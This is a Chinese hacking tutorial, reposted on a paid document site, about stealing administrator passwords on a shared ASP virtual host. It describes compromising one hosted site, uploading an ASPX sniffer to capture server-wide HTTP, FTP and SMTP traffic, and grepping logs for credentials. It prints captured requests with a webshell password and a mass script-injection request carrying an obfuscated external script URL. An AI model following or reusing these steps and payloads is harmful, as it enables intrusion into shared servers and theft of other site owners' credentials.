[实例夺取管理员密码.docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
[实例夺取管理员密码

实例讲解拿虚拟主机管理员密码 发表时间:2010-11-30 10:43:01 作者:梦飘 来源:红客联盟 收藏本页 过程是我搞的,但是当时我没截图,所以整理出来的这个文章时间就有点对不上,不过确实是这么个步骤 首先是嗅探工具,asp的虚拟一般都支持aspx(少数不支持的忽略哈),那么用C#调用winsock嗅探下80端口、顺便连ftp和SMTP端口一起监听了吧。 第一步,随便旁注拿下asp虚拟主机上的一个网站,上传aspx的工具(工具我会随后发上来的)如图: ?? ?????????????? 这个虚拟主机还算不错,才三分钟,就Packets: 260这么多包了 一个通宵抓包,好了,该分析日志了。 日志下载下来,因为虚拟主机,监听的是整个服务器,信息量太大,只能有选择的分析,搜索admin、pass、user、login等等有选择的看包。 从抓包中发现,很多人在暴力猜解ftp密码。。。晕,这是何苦呢 搜索admin这一关键词时有这么一个部分引起了我的注意,如图: ?? ??????????? 目录是admin下的文件,而且还有Cookie。。。很明显。呵呵 再看往下: POST: /Admin/sent.asp HTTP/1.1 Via: 1.0 PROXY Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG Referer: /Admin/sent.asp Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) Host: Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: zh-cn UA-CPU: x86 Pragma: no-cache Connection: Keep-Alive Content-Length: 13 pass=buqiuren 慢慢来看,无关的跳过了哈 POST: /Admin/sent.asp 发送指令到admin目录的sent.asp Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG 这个不用解释了吧,用session,session似乎不能像Cookie那样欺骗,能我也不会 Referer: /Admin/sent.asp 完整的url估计就是这个不错了,打开看看。居然是webshell 这下就更省事了 ?? ???????????????????? 好了,继续往下看: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727) 反正不是我机器上的 下面的越看越无聊,直接跳到最后: pass=buqiuren 输入密码:buqiuren即可登录 ?? ????????????? 下面就是批量清马,清理找webshell了 PS:做人要积德,挂马盗号这样的无德无良的事情最好不要干,修复漏洞,留张条就行了。罪过啊罪过 look,挂马的信息也抓出来了。。。。好无聊 POST /Admin/sent.asp?Action=plgmcode=script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46/script HTTP/1.1 Via: 1.0 PROXY Cookie: ASPSESSIONIDASQASTBB=JIBGEFDDOJIALLHIOMHNOMOG Referer: /Admin/sent.asp?Action=plgmcode=script%20src=http://%25%37%39%2E%73%25%36%39%6E%25%36%31%25%33%31%25%33%36%33%25%32%45%25%36%39%25%36%45%66%25%36%46/script Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (co

文档评论(0)

xiaoyi2013 + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档